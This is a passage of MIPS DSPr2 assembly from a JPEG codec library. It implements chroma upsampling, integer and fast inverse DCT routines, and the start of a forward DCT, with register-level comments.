ulw t0, 0(t6) /* t0 = |P3|P2|P1|P0| */
ulw t2, 4(t6) /* t2 = |P7|P6|P5|P4| */
srl t1, t0, 16 /* t1 = |X|X|P3|P2| */
ins t0, t0, 16, 16 /* t0 = |P1|P0|P1|P0| */
ins t1, t1, 16, 16 /* t1 = |P3|P2|P3|P2| */
ins t0, t0, 8, 16 /* t0 = |P1|P1|P0|P0| */
ins t1, t1, 8, 16 /* t1 = |P3|P3|P2|P2| */
usw t0, 0(t5)
usw t1, 4(t5)
srl t0, t2, 16 /* t0 = |X|X|P7|P6| */
ins t2, t2, 16, 16 /* t2 = |P5|P4|P5|P4| */
ins t0, t0, 16, 16 /* t0 = |P7|P6|P7|P6| */
ins t2, t2, 8, 16 /* t2 = |P5|P5|P4|P4| */
ins t0, t0, 8, 16 /* t0 = |P7|P7|P6|P6| */
usw t2, 8(t5)
usw t0, 12(t5)
addiu t5, 16
bne t5, t3, 1b
addiu t6, 8
beqz t8, 3f
move t4, t8
2:
lbu t1, 0(t6)
sb t1, 0(t5)
sb t1, 1(t5)
addiu t4, -2
addiu t6, 1
bgtz t4, 2b
addiu t5, 2
3:
addiu t7, 4
bne t9, t7, 0b
addiu a2, 4
4:
j ra
nop
END(jsimd_h2v1_upsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_h2v2_upsample_dspr2)
/*
* a0 = cinfo->max_v_samp_factor
* a1 = cinfo->output_width
* a2 = input_data
* a3 = output_data_ptr
*/
lw t7, 0(a3)
blez a0, 7f
andi t9, a1, 0xf /* t9 = residual */
0:
lw t6, 0(a2) /* t6 = inptr */
lw t5, 0(t7) /* t5 = outptr */
addu t8, t5, a1 /* t8 = outptr end address */
subu t8, t9 /* t8 = end address - residual */
beq t5, t8, 2f
move t4, t9
1:
ulw t0, 0(t6)
srl t1, t0, 16
ins t0, t0, 16, 16
ins t0, t0, 8, 16
ins t1, t1, 16, 16
ins t1, t1, 8, 16
ulw t2, 4(t6)
usw t0, 0(t5)
usw t1, 4(t5)
srl t3, t2, 16
ins t2, t2, 16, 16
ins t2, t2, 8, 16
ins t3, t3, 16, 16
ins t3, t3, 8, 16
usw t2, 8(t5)
usw t3, 12(t5)
addiu t5, 16
bne t5, t8, 1b
addiu t6, 8
beqz t9, 3f
move t4, t9
2:
lbu t0, 0(t6)
sb t0, 0(t5)
sb t0, 1(t5)
addiu t4, -2
addiu t6, 1
bgtz t4, 2b
addiu t5, 2
3:
lw t6, 0(t7) /* t6 = outptr[0] */
lw t5, 4(t7) /* t5 = outptr[1] */
addu t4, t6, a1 /* t4 = new end address */
beq a1, t9, 5f
subu t8, t4, t9
4:
ulw t0, 0(t6)
ulw t1, 4(t6)
ulw t2, 8(t6)
usw t0, 0(t5)
ulw t0, 12(t6)
usw t1, 4(t5)
usw t2, 8(t5)
usw t0, 12(t5)
addiu t6, 16
bne t6, t8, 4b
addiu t5, 16
beqz t9, 6f
nop
5:
lbu t0, 0(t6)
sb t0, 0(t5)
addiu t6, 1
bne t6, t4, 5b
addiu t5, 1
6:
addiu t7, 8
addiu a0, -2
bgtz a0, 0b
addiu a2, 4
7:
j ra
nop
END(jsimd_h2v2_upsample_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_islow_dspr2)
/*
* a0 = coef_block
* a1 = compptr->dcttable
* a2 = output
* a3 = range_limit
*/
SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
addiu sp, sp, -256
move v0, sp
addiu v1, zero, 8 /* v1 = DCTSIZE = 8 */
1:
lh s4, 32(a0) /* s4 = inptr[16] */
lh s5, 64(a0) /* s5 = inptr[32] */
lh s6, 96(a0) /* s6 = inptr[48] */
lh t1, 112(a0) /* t1 = inptr[56] */
lh t7, 16(a0) /* t7 = inptr[8] */
lh t5, 80(a0) /* t5 = inptr[40] */
lh t3, 48(a0) /* t3 = inptr[24] */
or s4, s4, t1
or s4, s4, t3
or s4, s4, t5
or s4, s4, t7
or s4, s4, s5
or s4, s4, s6
bnez s4, 2f
addiu v1, v1, -1
lh s5, 0(a1) /* quantptr[DCTSIZE*0] */
lh s6, 0(a0) /* inptr[DCTSIZE*0] */
mul s5, s5, s6 /* DEQUANTIZE(inptr[0], quantptr[0]) */
sll s5, s5, 2
sw s5, 0(v0)
sw s5, 32(v0)
sw s5, 64(v0)
sw s5, 96(v0)
sw s5, 128(v0)
sw s5, 160(v0)
sw s5, 192(v0)
b 3f
sw s5, 224(v0)
2:
lh t0, 112(a1)
lh t2, 48(a1)
lh t4, 80(a1)
lh t6, 16(a1)
mul t0, t0, t1 /* DEQUANTIZE(inptr[DCTSIZE*7],
quantptr[DCTSIZE*7]) */
mul t1, t2, t3 /* DEQUANTIZE(inptr[DCTSIZE*3],
quantptr[DCTSIZE*3]) */
mul t2, t4, t5 /* DEQUANTIZE(inptr[DCTSIZE*5],
quantptr[DCTSIZE*5]) */
mul t3, t6, t7 /* DEQUANTIZE(inptr[DCTSIZE*1],
quantptr[DCTSIZE*1]) */
lh t4, 32(a1)
lh t5, 32(a0)
lh t6, 96(a1)
lh t7, 96(a0)
addu s0, t0, t1 /* z3 = tmp0 + tmp2 */
addu s1, t1, t2 /* z2 = tmp1 + tmp2 */
addu s2, t2, t3 /* z4 = tmp1 + tmp3 */
addu s3, s0, s2 /* z3 + z4 */
addiu t9, zero, 9633 /* FIX_1_175875602 */
mul s3, s3, t9 /* z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
addu t8, t0, t3 /* z1 = tmp0 + tmp3 */
addiu t9, zero, 2446 /* FIX_0_298631336 */
mul t0, t0, t9 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
addiu t9, zero, 16819 /* FIX_2_053119869 */
mul t2, t2, t9 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
addiu t9, zero, 25172 /* FIX_3_072711026 */
mul t1, t1, t9 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
addiu t9, zero, 12299 /* FIX_1_501321110 */
mul t3, t3, t9 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
addiu t9, zero, 16069 /* FIX_1_961570560 */
mul s0, s0, t9 /* -z3 = MULTIPLY(z3, FIX_1_961570560) */
addiu t9, zero, 3196 /* FIX_0_390180644 */
mul s2, s2, t9 /* -z4 = MULTIPLY(z4, FIX_0_390180644) */
addiu t9, zero, 7373 /* FIX_0_899976223 */
mul t8, t8, t9 /* -z1 = MULTIPLY(z1, FIX_0_899976223) */
addiu t9, zero, 20995 /* FIX_2_562915447 */
mul s1, s1, t9 /* -z2 = MULTIPLY(z2, FIX_2_562915447) */
subu s0, s3, s0 /* z3 += z5 */
addu t0, t0, s0 /* tmp0 += z3 */
addu t1, t1, s0 /* tmp2 += z3 */
subu s2, s3, s2 /* z4 += z5 */
addu t2, t2, s2 /* tmp1 += z4 */
addu t3, t3, s2 /* tmp3 += z4 */
subu t0, t0, t8 /* tmp0 += z1 */
subu t1, t1, s1 /* tmp2 += z2 */
subu t2, t2, s1 /* tmp1 += z2 */
subu t3, t3, t8 /* tmp3 += z1 */
mul s0, t4, t5 /* DEQUANTIZE(inptr[DCTSIZE*2],
quantptr[DCTSIZE*2]) */
addiu t9, zero, 6270 /* FIX_0_765366865 */
mul s1, t6, t7 /* DEQUANTIZE(inptr[DCTSIZE*6],
quantptr[DCTSIZE*6]) */
lh t4, 0(a1)
lh t5, 0(a0)
lh t6, 64(a1)
lh t7, 64(a0)
mul s2, t9, s0 /* MULTIPLY(z2, FIX_0_765366865) */
mul t5, t4, t5 /* DEQUANTIZE(inptr[DCTSIZE*0],
quantptr[DCTSIZE*0]) */
mul t6, t6, t7 /* DEQUANTIZE(inptr[DCTSIZE*4],
quantptr[DCTSIZE*4]) */
addiu t9, zero, 4433 /* FIX_0_541196100 */
addu s3, s0, s1 /* z2 + z3 */
mul s3, s3, t9 /* z1 = MULTIPLY(z2 + z3, FIX_0_541196100) */
addiu t9, zero, 15137 /* FIX_1_847759065 */
mul t8, s1, t9 /* MULTIPLY(z3, FIX_1_847759065) */
addu t4, t5, t6
subu t5, t5, t6
sll t4, t4, 13 /* tmp0 = (z2 + z3) << CONST_BITS */
sll t5, t5, 13 /* tmp1 = (z2 - z3) << CONST_BITS */
addu t7, s3, s2 /* tmp3 = z1 + MULTIPLY(z2, FIX_0_765366865) */
subu t6, s3, t8 /* tmp2 =
z1 + MULTIPLY(z3, -FIX_1_847759065) */
addu s0, t4, t7
subu s1, t4, t7
addu s2, t5, t6
subu s3, t5, t6
addu t4, s0, t3
subu s0, s0, t3
addu t3, s2, t1
subu s2, s2, t1
addu t1, s3, t2
subu s3, s3, t2
addu t2, s1, t0
subu s1, s1, t0
shra_r.w t4, t4, 11
shra_r.w t3, t3, 11
shra_r.w t1, t1, 11
shra_r.w t2, t2, 11
shra_r.w s1, s1, 11
shra_r.w s3, s3, 11
shra_r.w s2, s2, 11
shra_r.w s0, s0, 11
sw t4, 0(v0)
sw t3, 32(v0)
sw t1, 64(v0)
sw t2, 96(v0)
sw s1, 128(v0)
sw s3, 160(v0)
sw s2, 192(v0)
sw s0, 224(v0)
3:
addiu a1, a1, 2
addiu a0, a0, 2
bgtz v1, 1b
addiu v0, v0, 4
move v0, sp
addiu v1, zero, 8
4:
lw t0, 8(v0) /* z2 = (JLONG)wsptr[2] */
lw t1, 24(v0) /* z3 = (JLONG)wsptr[6] */
lw t2, 0(v0) /* (JLONG)wsptr[0] */
lw t3, 16(v0) /* (JLONG)wsptr[4] */
lw s4, 4(v0) /* (JLONG)wsptr[1] */
lw s5, 12(v0) /* (JLONG)wsptr[3] */
lw s6, 20(v0) /* (JLONG)wsptr[5] */
lw s7, 28(v0) /* (JLONG)wsptr[7] */
or s4, s4, t0
or s4, s4, t1
or s4, s4, t3
or s4, s4, s7
or s4, s4, s5
or s4, s4, s6
bnez s4, 5f
addiu v1, v1, -1
shra_r.w s5, t2, 5
andi s5, s5, 0x3ff
lbux s5, s5(a3)
lw s1, 0(a2)
replv.qb s5, s5
usw s5, 0(s1)
usw s5, 4(s1)
b 6f
nop
5:
addu t4, t0, t1 /* z2 + z3 */
addiu t8, zero, 4433 /* FIX_0_541196100 */
mul t5, t4, t8 /* z1 = MULTIPLY(z2 + z3, FIX_0_541196100) */
addiu t8, zero, 15137 /* FIX_1_847759065 */
mul t1, t1, t8 /* MULTIPLY(z3, FIX_1_847759065) */
addiu t8, zero, 6270 /* FIX_0_765366865 */
mul t0, t0, t8 /* MULTIPLY(z2, FIX_0_765366865) */
addu t4, t2, t3 /* (JLONG)wsptr[0] + (JLONG)wsptr[4] */
subu t2, t2, t3 /* (JLONG)wsptr[0] - (JLONG)wsptr[4] */
sll t4, t4, 13 /* tmp0 =
(wsptr[0] + wsptr[4]) << CONST_BITS */
sll t2, t2, 13 /* tmp1 =
(wsptr[0] - wsptr[4]) << CONST_BITS */
subu t1, t5, t1 /* tmp2 =
z1 + MULTIPLY(z3, -FIX_1_847759065) */
subu t3, t2, t1 /* tmp12 = tmp1 - tmp2 */
addu t2, t2, t1 /* tmp11 = tmp1 + tmp2 */
addu t5, t5, t0 /* tmp3 =
z1 + MULTIPLY(z2, FIX_0_765366865) */
subu t1, t4, t5 /* tmp13 = tmp0 - tmp3 */
addu t0, t4, t5 /* tmp10 = tmp0 + tmp3 */
lw t4, 28(v0) /* tmp0 = (JLONG)wsptr[7] */
lw t6, 12(v0) /* tmp2 = (JLONG)wsptr[3] */
lw t5, 20(v0) /* tmp1 = (JLONG)wsptr[5] */
lw t7, 4(v0) /* tmp3 = (JLONG)wsptr[1] */
addu s0, t4, t6 /* z3 = tmp0 + tmp2 */
addiu t8, zero, 9633 /* FIX_1_175875602 */
addu s1, t5, t7 /* z4 = tmp1 + tmp3 */
addu s2, s0, s1 /* z3 + z4 */
mul s2, s2, t8 /* z5 = MULTIPLY(z3 + z4, FIX_1_175875602) */
addu s3, t4, t7 /* z1 = tmp0 + tmp3 */
addu t9, t5, t6 /* z2 = tmp1 + tmp2 */
addiu t8, zero, 16069 /* FIX_1_961570560 */
mul s0, s0, t8 /* -z3 = MULTIPLY(z3, FIX_1_961570560) */
addiu t8, zero, 3196 /* FIX_0_390180644 */
mul s1, s1, t8 /* -z4 = MULTIPLY(z4, FIX_0_390180644) */
addiu t8, zero, 2446 /* FIX_0_298631336 */
mul t4, t4, t8 /* tmp0 = MULTIPLY(tmp0, FIX_0_298631336) */
addiu t8, zero, 7373 /* FIX_0_899976223 */
mul s3, s3, t8 /* -z1 = MULTIPLY(z1, FIX_0_899976223) */
addiu t8, zero, 16819 /* FIX_2_053119869 */
mul t5, t5, t8 /* tmp1 = MULTIPLY(tmp1, FIX_2_053119869) */
addiu t8, zero, 20995 /* FIX_2_562915447 */
mul t9, t9, t8 /* -z2 = MULTIPLY(z2, FIX_2_562915447) */
addiu t8, zero, 25172 /* FIX_3_072711026 */
mul t6, t6, t8 /* tmp2 = MULTIPLY(tmp2, FIX_3_072711026) */
addiu t8, zero, 12299 /* FIX_1_501321110 */
mul t7, t7, t8 /* tmp3 = MULTIPLY(tmp3, FIX_1_501321110) */
subu s0, s2, s0 /* z3 += z5 */
subu s1, s2, s1 /* z4 += z5 */
addu t4, t4, s0
subu t4, t4, s3 /* tmp0 */
addu t5, t5, s1
subu t5, t5, t9 /* tmp1 */
addu t6, t6, s0
subu t6, t6, t9 /* tmp2 */
addu t7, t7, s1
subu t7, t7, s3 /* tmp3 */
addu s0, t0, t7
subu t0, t0, t7
addu t7, t2, t6
subu t2, t2, t6
addu t6, t3, t5
subu t3, t3, t5
addu t5, t1, t4
subu t1, t1, t4
shra_r.w s0, s0, 18
shra_r.w t7, t7, 18
shra_r.w t6, t6, 18
shra_r.w t5, t5, 18
shra_r.w t1, t1, 18
shra_r.w t3, t3, 18
shra_r.w t2, t2, 18
shra_r.w t0, t0, 18
andi s0, s0, 0x3ff
andi t7, t7, 0x3ff
andi t6, t6, 0x3ff
andi t5, t5, 0x3ff
andi t1, t1, 0x3ff
andi t3, t3, 0x3ff
andi t2, t2, 0x3ff
andi t0, t0, 0x3ff
lw s1, 0(a2)
lbux s0, s0(a3)
lbux t7, t7(a3)
lbux t6, t6(a3)
lbux t5, t5(a3)
lbux t1, t1(a3)
lbux t3, t3(a3)
lbux t2, t2(a3)
lbux t0, t0(a3)
sb s0, 0(s1)
sb t7, 1(s1)
sb t6, 2(s1)
sb t5, 3(s1)
sb t1, 4(s1)
sb t3, 5(s1)
sb t2, 6(s1)
sb t0, 7(s1)
6:
addiu v0, v0, 32
bgtz v1, 4b
addiu a2, a2, 4
addiu sp, sp, 256
RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
j ra
nop
END(jsimd_idct_islow_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_ifast_cols_dspr2)
/*
* a0 = inptr
* a1 = quantptr
* a2 = wsptr
* a3 = mips_idct_ifast_coefs
*/
SAVE_REGS_ON_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
addiu t9, a0, 16 /* end address */
or AT, a3, zero
0:
lw s0, 0(a1) /* quantptr[DCTSIZE*0] */
lw t0, 0(a0) /* inptr[DCTSIZE*0] */
lw t1, 16(a0) /* inptr[DCTSIZE*1] */
muleq_s.w.phl v0, t0, s0 /* tmp0 ... */
lw t2, 32(a0) /* inptr[DCTSIZE*2] */
lw t3, 48(a0) /* inptr[DCTSIZE*3] */
lw t4, 64(a0) /* inptr[DCTSIZE*4] */
lw t5, 80(a0) /* inptr[DCTSIZE*5] */
muleq_s.w.phr t0, t0, s0 /* ... tmp0 ... */
lw t6, 96(a0) /* inptr[DCTSIZE*6] */
lw t7, 112(a0) /* inptr[DCTSIZE*7] */
or s4, t1, t2
or s5, t3, t4
bnez s4, 1f
ins t0, v0, 16, 16 /* ... tmp0 */
bnez s5, 1f
or s6, t5, t6
or s6, s6, t7
bnez s6, 1f
sw t0, 0(a2) /* wsptr[DCTSIZE*0] */
sw t0, 16(a2) /* wsptr[DCTSIZE*1] */
sw t0, 32(a2) /* wsptr[DCTSIZE*2] */
sw t0, 48(a2) /* wsptr[DCTSIZE*3] */
sw t0, 64(a2) /* wsptr[DCTSIZE*4] */
sw t0, 80(a2) /* wsptr[DCTSIZE*5] */
sw t0, 96(a2) /* wsptr[DCTSIZE*6] */
sw t0, 112(a2) /* wsptr[DCTSIZE*7] */
addiu a0, a0, 4
b 2f
addiu a1, a1, 4
1:
lw s1, 32(a1) /* quantptr[DCTSIZE*2] */
lw s2, 64(a1) /* quantptr[DCTSIZE*4] */
muleq_s.w.phl v0, t2, s1 /* tmp1 ... */
muleq_s.w.phr t2, t2, s1 /* ... tmp1 ... */
lw s0, 16(a1) /* quantptr[DCTSIZE*1] */
lw s1, 48(a1) /* quantptr[DCTSIZE*3] */
lw s3, 96(a1) /* quantptr[DCTSIZE*6] */
muleq_s.w.phl v1, t4, s2 /* tmp2 ... */
muleq_s.w.phr t4, t4, s2 /* ... tmp2 ... */
lw s2, 80(a1) /* quantptr[DCTSIZE*5] */
lw t8, 4(AT) /* FIX(1.414213562) */
ins t2, v0, 16, 16 /* ... tmp1 */
muleq_s.w.phl v0, t6, s3 /* tmp3 ... */
muleq_s.w.phr t6, t6, s3 /* ... tmp3 ... */
ins t4, v1, 16, 16 /* ... tmp2 */
addq.ph s4, t0, t4 /* tmp10 */
subq.ph s5, t0, t4 /* tmp11 */
ins t6, v0, 16, 16 /* ... tmp3 */
subq.ph s6, t2, t6 /* tmp12 ... */
addq.ph s7, t2, t6 /* tmp13 */
mulq_s.ph s6, s6, t8 /* ... tmp12 ... */
addq.ph t0, s4, s7 /* tmp0 */
subq.ph t6, s4, s7 /* tmp3 */
muleq_s.w.phl v0, t1, s0 /* tmp4 ... */
muleq_s.w.phr t1, t1, s0 /* ... tmp4 ... */
shll_s.ph s6, s6, 1 /* x2 */
lw s3, 112(a1) /* quantptr[DCTSIZE*7] */
subq.ph s6, s6, s7 /* ... tmp12 */
muleq_s.w.phl v1, t7, s3 /* tmp7 ... */
muleq_s.w.phr t7, t7, s3 /* ... tmp7 ... */
ins t1, v0, 16, 16 /* ... tmp4 */
addq.ph t2, s5, s6 /* tmp1 */
subq.ph t4, s5, s6 /* tmp2 */
muleq_s.w.phl v0, t5, s2 /* tmp6 ... */
muleq_s.w.phr t5, t5, s2 /* ... tmp6 ... */
ins t7, v1, 16, 16 /* ... tmp7 */
addq.ph s5, t1, t7 /* z11 */
subq.ph s6, t1, t7 /* z12 */
muleq_s.w.phl v1, t3, s1 /* tmp5 ... */
muleq_s.w.phr t3, t3, s1 /* ... tmp5 ... */
ins t5, v0, 16, 16 /* ... tmp6 */
ins t3, v1, 16, 16 /* ... tmp5 */
addq.ph s7, t5, t3 /* z13 */
subq.ph v0, t5, t3 /* z10 */
addq.ph t7, s5, s7 /* tmp7 */
subq.ph s5, s5, s7 /* tmp11 ... */
addq.ph v1, v0, s6 /* z5 ... */
mulq_s.ph s5, s5, t8 /* ... tmp11 */
lw t8, 8(AT) /* FIX(1.847759065) */
lw s4, 0(AT) /* FIX(1.082392200) */
addq.ph s0, t0, t7
subq.ph s1, t0, t7
mulq_s.ph v1, v1, t8 /* ... z5 */
shll_s.ph s5, s5, 1 /* x2 */
lw t8, 12(AT) /* FIX(-2.613125930) */
sw s0, 0(a2) /* wsptr[DCTSIZE*0] */
shll_s.ph v0, v0, 1 /* x4 */
mulq_s.ph v0, v0, t8 /* tmp12 ... */
mulq_s.ph s4, s6, s4 /* tmp10 ... */
shll_s.ph v1, v1, 1 /* x2 */
addiu a0, a0, 4
addiu a1, a1, 4
sw s1, 112(a2) /* wsptr[DCTSIZE*7] */
shll_s.ph s6, v0, 1 /* x4 */
shll_s.ph s4, s4, 1 /* x2 */
addq.ph s6, s6, v1 /* ... tmp12 */
subq.ph t5, s6, t7 /* tmp6 */
subq.ph s4, s4, v1 /* ... tmp10 */
subq.ph t3, s5, t5 /* tmp5 */
addq.ph s2, t2, t5
addq.ph t1, s4, t3 /* tmp4 */
subq.ph s3, t2, t5
sw s2, 16(a2) /* wsptr[DCTSIZE*1] */
sw s3, 96(a2) /* wsptr[DCTSIZE*6] */
addq.ph v0, t4, t3
subq.ph v1, t4, t3
sw v0, 32(a2) /* wsptr[DCTSIZE*2] */
sw v1, 80(a2) /* wsptr[DCTSIZE*5] */
addq.ph v0, t6, t1
subq.ph v1, t6, t1
sw v0, 64(a2) /* wsptr[DCTSIZE*4] */
sw v1, 48(a2) /* wsptr[DCTSIZE*3] */
2:
bne a0, t9, 0b
addiu a2, a2, 4
RESTORE_REGS_FROM_STACK 32, s0, s1, s2, s3, s4, s5, s6, s7
j ra
nop
END(jsimd_idct_ifast_cols_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_idct_ifast_rows_dspr2)
/*
* a0 = wsptr
* a1 = output_buf
* a2 = output_col
* a3 = mips_idct_ifast_coefs
*/
SAVE_REGS_ON_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, s8, a3
addiu t9, a0, 128 /* end address */
lui s8, 0x8080
ori s8, s8, 0x8080
0:
lw AT, 36(sp) /* restore $a3 (mips_idct_ifast_coefs) */
lw t0, 0(a0) /* wsptr[DCTSIZE*0+0/1] b a */
lw s0, 16(a0) /* wsptr[DCTSIZE*1+0/1] B A */
lw t2, 4(a0) /* wsptr[DCTSIZE*0+2/3] d c */
lw s2, 20(a0) /* wsptr[DCTSIZE*1+2/3] D C */
lw t4, 8(a0) /* wsptr[DCTSIZE*0+4/5] f e */
lw s4, 24(a0) /* wsptr[DCTSIZE*1+4/5] F E */
lw t6, 12(a0) /* wsptr[DCTSIZE*0+6/7] h g */
lw s6, 28(a0) /* wsptr[DCTSIZE*1+6/7] H G */
precrq.ph.w t1, s0, t0 /* B b */
ins t0, s0, 16, 16 /* A a */
bnez t1, 1f
or s0, t2, s2
bnez s0, 1f
or s0, t4, s4
bnez s0, 1f
or s0, t6, s6
bnez s0, 1f
shll_s.ph s0, t0, 2 /* A a */
lw a3, 0(a1)
lw AT, 4(a1)
precrq.ph.w t0, s0, s0 /* A A */
ins s0, s0, 16, 16 /* a a */
addu a3, a3, a2
addu AT, AT, a2
precrq.qb.ph t0, t0, t0 /* A A A A */
precrq.qb.ph s0, s0, s0 /* a a a a */
addu.qb s0, s0, s8
addu.qb t0, t0, s8
sw s0, 0(a3)
sw s0, 4(a3)
sw t0, 0(AT)
sw t0, 4(AT)
addiu a0, a0, 32
bne a0, t9, 0b
addiu a1, a1, 8
b 2f
nop
1:
precrq.ph.w t3, s2, t2
ins t2, s2, 16, 16
precrq.ph.w t5, s4, t4
ins t4, s4, 16, 16
precrq.ph.w t7, s6, t6
ins t6, s6, 16, 16
lw t8, 4(AT) /* FIX(1.414213562) */
addq.ph s4, t0, t4 /* tmp10 */
subq.ph s5, t0, t4 /* tmp11 */
subq.ph s6, t2, t6 /* tmp12 ... */
addq.ph s7, t2, t6 /* tmp13 */
mulq_s.ph s6, s6, t8 /* ... tmp12 ... */
addq.ph t0, s4, s7 /* tmp0 */
subq.ph t6, s4, s7 /* tmp3 */
shll_s.ph s6, s6, 1 /* x2 */
subq.ph s6, s6, s7 /* ... tmp12 */
addq.ph t2, s5, s6 /* tmp1 */
subq.ph t4, s5, s6 /* tmp2 */
addq.ph s5, t1, t7 /* z11 */
subq.ph s6, t1, t7 /* z12 */
addq.ph s7, t5, t3 /* z13 */
subq.ph v0, t5, t3 /* z10 */
addq.ph t7, s5, s7 /* tmp7 */
subq.ph s5, s5, s7 /* tmp11 ... */
addq.ph v1, v0, s6 /* z5 ... */
mulq_s.ph s5, s5, t8 /* ... tmp11 */
lw t8, 8(AT) /* FIX(1.847759065) */
lw s4, 0(AT) /* FIX(1.082392200) */
addq.ph s0, t0, t7 /* tmp0 + tmp7 */
subq.ph s7, t0, t7 /* tmp0 - tmp7 */
mulq_s.ph v1, v1, t8 /* ... z5 */
lw a3, 0(a1)
lw t8, 12(AT) /* FIX(-2.613125930) */
shll_s.ph s5, s5, 1 /* x2 */
addu a3, a3, a2
shll_s.ph v0, v0, 1 /* x4 */
mulq_s.ph v0, v0, t8 /* tmp12 ... */
mulq_s.ph s4, s6, s4 /* tmp10 ... */
shll_s.ph v1, v1, 1 /* x2 */
addiu a0, a0, 32
addiu a1, a1, 8
shll_s.ph s6, v0, 1 /* x4 */
shll_s.ph s4, s4, 1 /* x2 */
addq.ph s6, s6, v1 /* ... tmp12 */
shll_s.ph s0, s0, 2
subq.ph t5, s6, t7 /* tmp6 */
subq.ph s4, s4, v1 /* ... tmp10 */
subq.ph t3, s5, t5 /* tmp5 */
shll_s.ph s7, s7, 2
addq.ph t1, s4, t3 /* tmp4 */
addq.ph s1, t2, t5 /* tmp1 + tmp6 */
subq.ph s6, t2, t5 /* tmp1 - tmp6 */
addq.ph s2, t4, t3 /* tmp2 + tmp5 */
subq.ph s5, t4, t3 /* tmp2 - tmp5 */
addq.ph s4, t6, t1 /* tmp3 + tmp4 */
subq.ph s3, t6, t1 /* tmp3 - tmp4 */
shll_s.ph s1, s1, 2
shll_s.ph s2, s2, 2
shll_s.ph s3, s3, 2
shll_s.ph s4, s4, 2
shll_s.ph s5, s5, 2
shll_s.ph s6, s6, 2
precrq.ph.w t0, s1, s0 /* B A */
ins s0, s1, 16, 16 /* b a */
precrq.ph.w t2, s3, s2 /* D C */
ins s2, s3, 16, 16 /* d c */
precrq.ph.w t4, s5, s4 /* F E */
ins s4, s5, 16, 16 /* f e */
precrq.ph.w t6, s7, s6 /* H G */
ins s6, s7, 16, 16 /* h g */
precrq.qb.ph t0, t2, t0 /* D C B A */
precrq.qb.ph s0, s2, s0 /* d c b a */
precrq.qb.ph t4, t6, t4 /* H G F E */
precrq.qb.ph s4, s6, s4 /* h g f e */
addu.qb s0, s0, s8
addu.qb s4, s4, s8
sw s0, 0(a3) /* outptr[0/1/2/3] d c b a */
sw s4, 4(a3) /* outptr[4/5/6/7] h g f e */
lw a3, -4(a1)
addu.qb t0, t0, s8
addu a3, a3, a2
addu.qb t4, t4, s8
sw t0, 0(a3) /* outptr[0/1/2/3] D C B A */
bne a0, t9, 0b
sw t4, 4(a3) /* outptr[4/5/6/7] H G F E */
2:
RESTORE_REGS_FROM_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, s8, a3
j ra
nop
END(jsimd_idct_ifast_rows_dspr2)
/*****************************************************************************/
LEAF_DSPR2(jsimd_fdct_islow_dspr2)
/*
* a0 = data
*/
SAVE_REGS_ON_STACK 40, s0, s1, s2, s3, s4, s5, s6, s7, s8
lui t0, 6437
ori t0, 2260
lui t1, 9633
ori t1, 11363
lui t2, 0xd39e
ori t2, 0xe6dc
lui t3, 0xf72d
ori t3, 9633
lui t4, 2261
ori t4, 9633
lui t5, 0xd39e
ori t5, 6437
lui t6, 9633
ori t6, 0xd39d
lui t7, 0xe6dc
ori t7, 2260
lui t8, 4433
ori t8, 10703
lui t9, 0xd630
ori t9, 4433
li s8, 8
move a1, a0
1:
lw s0, 0(a1) /* tmp0 = 1|0 */
lw s1, 4(a1) /* tmp1 = 3|2 */
lw s2, 8(a1) /* tmp2 = 5|4 */
lw s3, 12(a1) /* tmp3 = 7|6 */
packrl.ph s1, s1, s1 /* tmp1 = 2|3 */
packrl.ph s3, s3, s3 /* tmp3 = 6|7 */
subq.ph s7, s1, s2 /* tmp7 = 2-5|3-4 = t5|t4 */
subq.ph s5, s0, s3 /* tmp5 = 1-6|0-7 = t6|t7 */
mult $0, $0 /* ac0 = 0 */
dpa.w.ph $ac0, s7, t0 /* ac0 += t5* 6437 + t4* 2260 */
dpa.w.ph $ac0, s5, t1 /* ac0 += t6* 9633 + t7* 11363 */
mult $ac1, $0, $0 /* ac1 = 0 */
dpa.w.ph $ac1, s7, t2 /* ac1 += t5*-11362 + t4* -6436 */
dpa.w.ph $ac1, s5, t3 /* ac1 += t6* -2259 + t7* 9633 */
mult $ac2, $0, $0 /* ac2 = 0 */
dpa.w.ph $ac2, s7, t4 /* ac2 += t5* 2261 + t4* 9633 */
dpa.w.ph $ac2, s5, t5 /* ac2 += t6*-11362 + t7* 6437 */
mult $ac3, $0, $0 /* ac3 = 0 */
dpa.w.ph $ac3, s7, t6 /* ac3 += t5* 9633 + t4*-11363 */
dpa.w.ph $ac3, s5, t7 /* ac3 += t6* -6436 + t7* 2260 */
addq.ph s6, s1, s2 /* tmp6 = 2+5|3+4 = t2|t3 */
addq.ph s4, s0, s3 /* tmp4 = 1+6|0+7 = t1|t0 */
extr_r.w s0, $ac0, 11 /* tmp0 = (ac0 + 1024) >> 11 */
extr_r.w s1, $ac1, 11 /* tmp1 = (ac1 + 1024) >> 11 */
extr_r.w s2, $ac2, 11 /* tmp2 = (ac2 + 1024) >> 11 */
extr_r.w s3, $ac3, 11 /* tmp3 = (ac3 + 1024) >> 11 */
addq.ph s5, s4, s6 /* tmp5 = t1+t2|t0+t3 = t11|t10 */
subq.ph s7, s4, s6 /* tmp7 = t1-t2|t0-t3 = t12|t13 */
sh s0, 2(a1)
sh s1, 6(a1)
sh s2, 10(a1)
sh s3, 14(a1)
mult $0, $0 /* ac0 = 0 */
dpa.w.ph $ac0, s7, t8 /* ac0 += t12* 4433 + t13* 10703 */
mult $ac1, $0, $0 /* ac1 = 0 */
dpa.w.ph $ac1, s7, t9 /* ac1 += t12*-10704 + t13* 4433 */
sra s4, s5, 16 /* tmp4 = t11 */
addiu a1, a1, 16
addiu s8, s8, -1
extr_r.w s0, $ac0, 11 /* tmp0 = (ac0 + 1024) >> 11 */
extr_r.w s1, $ac1, 11 /* tmp1 = (ac1 + 1024) >> 11 */
